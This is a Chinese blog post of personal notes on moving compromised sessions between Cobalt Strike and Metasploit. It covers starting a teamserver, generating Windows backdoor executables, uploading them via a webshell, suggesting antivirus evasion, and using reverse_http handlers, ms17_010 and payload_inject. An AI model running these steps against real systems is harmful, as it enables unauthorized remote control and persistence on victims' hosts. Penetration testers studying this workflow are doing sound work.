cobalt strike 会话转移

我们在搞定了一台主机后,往往想要对其进行权限维持,提权的操作,这时后我们就可以使用cs生成一个后门程序,通过我们获得的webshell上传执行来进行进一步的利用。这里有几个容易忘记得操作,这里记录下来,方便以后复习。

一、CS会话传递到msf进行进一步利用

1.1 运行服务端

服务端一般放在我们得VPS等拥有公网ip地址的主机上面
我们在vps上面执行

cd obaltstrike4.3
./teamserver 192.168.248.142 111111

IP地址为我vps服务器本身的IP,111111为客户端连接的密码
这时候我们可以执行

netstat -ano | grep 50050

看到该端口已经打开了,teamserver默认在该端口监听

1.2 运行客户端

同样在我们的物理机上面同样要有cs的环境,进入里面有一个shell的可执行文件,我们执行它

./start.sh

这时候就会打开登录配置界面
输入连接的ip、端口号、用户名、密码即可登录成功

1.3 生成后门程序

1.3.1 设置监听器

在这里插入图片描述
在这里插入图片描述
http hosts 与http host(stager)填一样的为服务器ip,端口随便填为我本地的监听端口

1.3.2 生成后门

在这里插入图片描述
这里可选的种类很多,这里我们选择windows executable
在这里插入图片描述
选择号监听器,和输出的类型,其中有一个windows server 可以在启动项中使用,普通的是不能在启动项中使用的
同时windows executable是分段传输payload的,后门运行后会从服务端加载payload,所以可能会连接失败,还有一个windows executable(s)这是一个stageless,里面包含了完整的payload,所以相对来说较大。

1.4 运行后门程序

生成了后门后,把它发送到目标服务器运行,即可看到客户端有设备上线了!!!这玩意儿很容易被防火墙杀掉,考虑做一下免杀处理!

1.5添加会话

在这里插入图片描述
在这里插入图片描述
payload选择foreignhttp,stager主机填写运行msf的主机,ip也可自定义,添加完成后在选择payload串口选中刚添加的会话,然后点击choose即可

1.6 配置msf监听

进入msf,使用 exploit/mutil/handler模块,
然后设置lhost 为本机,lport为上一步添加会话时一致的端口,set payload windows/meterpreter/reverse_http
然后run
重新在客户端选择一次会话就成功了!!

二 msf会话传递到cs进行进一步利用

首先我们使用ms17_010或者其他漏洞打穿一个系统,进入到>meter界面,然后执行background,将该会话调度到后台,会回显一个session id给我们。
然后使用
use exploit/windows/local/payload_inject模块
set payload windows/meterpreter/reverse_http
set lhost 客户端主机ip
set lport 客户端监听器端口
set disablepayloadhandler true
set session id 上一步获得的sessionid
run
结束会回显进程id
然后我们到客户端就可以看到该进程id的主机上线了

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值